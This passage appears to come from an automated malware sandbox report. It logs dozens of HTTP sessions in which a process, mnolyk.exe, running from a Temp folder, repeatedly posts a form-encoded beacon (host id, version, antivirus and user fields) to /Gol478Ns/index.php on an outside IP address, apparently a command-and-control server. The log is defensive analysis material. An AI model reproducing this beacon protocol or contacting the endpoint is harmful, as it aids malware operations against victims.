                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:58.280103922 CET374INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:58 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          241192.168.2.64996362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:58.504584074 CET375OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:58.568939924 CET375INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:58 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          242192.168.2.64996462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:58.773796082 CET376OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:58.838499069 CET376INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:58 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          243192.168.2.64996562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:59.016139984 CET377OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:59.083553076 CET377INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:59 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          244192.168.2.64996662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:59.250310898 CET378OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:59.315323114 CET378INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:59 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          245192.168.2.64996762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:59.487215042 CET379OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:59.554467916 CET379INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:59 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          246192.168.2.64996862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:59.735491991 CET380OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:59.799014091 CET380INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:59 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          247192.168.2.64996962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:59.969580889 CET381OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:00.032289982 CET381INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:59 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          248192.168.2.64997062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:00.209992886 CET382OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:00.275804043 CET382INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:00 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          249192.168.2.64997162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:00.459434032 CET383OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:00.521142960 CET384INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:00 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          25192.168.2.64974362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:00:56.902350903 CET130OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:00:56.967124939 CET130INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:00:56 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          250192.168.2.64997362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:00.704663992 CET391OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:00.768744946 CET391INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:00 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          251192.168.2.64997462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:00.945241928 CET392OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:01.010104895 CET392INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:00 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          252192.168.2.64997562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:01.204511881 CET393OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:01.269857883 CET393INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:01 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          253192.168.2.64997662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:01.442059994 CET394OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:01.507285118 CET394INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:01 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          254192.168.2.64997762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:01.710756063 CET395OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:01.775300980 CET395INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:01 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          255192.168.2.64997862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:01.964464903 CET396OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:02.029624939 CET396INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:01 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          256192.168.2.64997962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:02.207617998 CET397OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:02.273052931 CET397INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:02 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          257192.168.2.64998062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:02.464632988 CET398OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:02.527991056 CET398INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:02 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          258192.168.2.64998162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:02.719021082 CET399OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:02.783189058 CET399INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:02 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          259192.168.2.64998262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:02.953057051 CET400OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:03.016334057 CET400INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:02 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          26192.168.2.64974462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:00:57.142499924 CET131OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
